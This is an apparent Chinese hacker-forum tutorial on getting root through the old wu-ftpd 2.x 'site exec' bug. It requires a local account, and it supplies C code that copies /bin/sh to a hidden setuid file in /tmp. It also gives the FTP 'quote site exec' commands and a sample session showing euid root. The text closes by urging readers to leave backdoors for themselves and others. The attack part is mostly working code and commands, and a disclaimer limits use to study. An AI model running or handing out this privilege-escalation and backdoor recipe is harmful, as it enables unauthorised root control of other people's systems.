如何使用wu-ftp2.x(site exec bug)来取得root权限 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

如何使用wu-ftp2.x(site exec bug)来取得root权限

无法 技术文章

1.需求:
(1)该主机的 ftpd 使用 wu-ftp 2.x 版本
(2)您必须有该主机的任何一个帐号
2.步骤:
(1)先 telnet login 到主机您的目录下...
(2)使用 cc -o bug bug.c 将下列程式编译...
--< bug.c >-----------------------------
#include 
#include 
#include 
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
}
-----------------------------------------
编译成功後会在您的目录下产生 bug 这个档案 (别忘了 chmod ...)
(3)使用 ftp login 到该主机下...
220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15 CDT 1997) ready. 
Name (hackerforce:ftp): funky
331 Password required for funky.
Password: (password)
230 User funky logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (检查系统是否能利用此 bug)
200-bash -c id
200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users) groups=50(users)
200 (end of 'bash -c id') (一但出现 euid=0 就成功了)
ftp> quote "site exec bash -c /yer/home/dir/ftpbug" (执行您刚编译成功的 bug)
200-bash -c /your/home/dir/bug
200 (end of 'bash -c /your/home/dir/bug')
ftp> quit (离开 ftp) 
221 Goodbye.
(4)再 telnet 进去该主机,执行 /tmp/.sh 这个 setuid root shell ...
$ id
uid=101(funky) gid=50(user)
$ /tmp/.sh
# id
uid=101(funky) gid=50(user) euid=0(root)
#
恭喜您...到此您就成功的拿到 root 权限了....
3.後记:
由於 wu-ftpd 执行时的 euid 是 root ,所以我们透过这个 hole 来执行执行外部的命令....当编译完的 bug 一但被执行,便会帮您将 /bin/sh 这个 shell 复制一份到 /tmp/.sh 下,并且会将 /tmp/.sh setuid ,一但成功後只要任何使用者执行 /tmp/.sh 这个 setuid shell 就会雍有 root 的 euid ....
一但您得手後,别忘了帮自己及别人多留些 backdoor... ;-)
标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表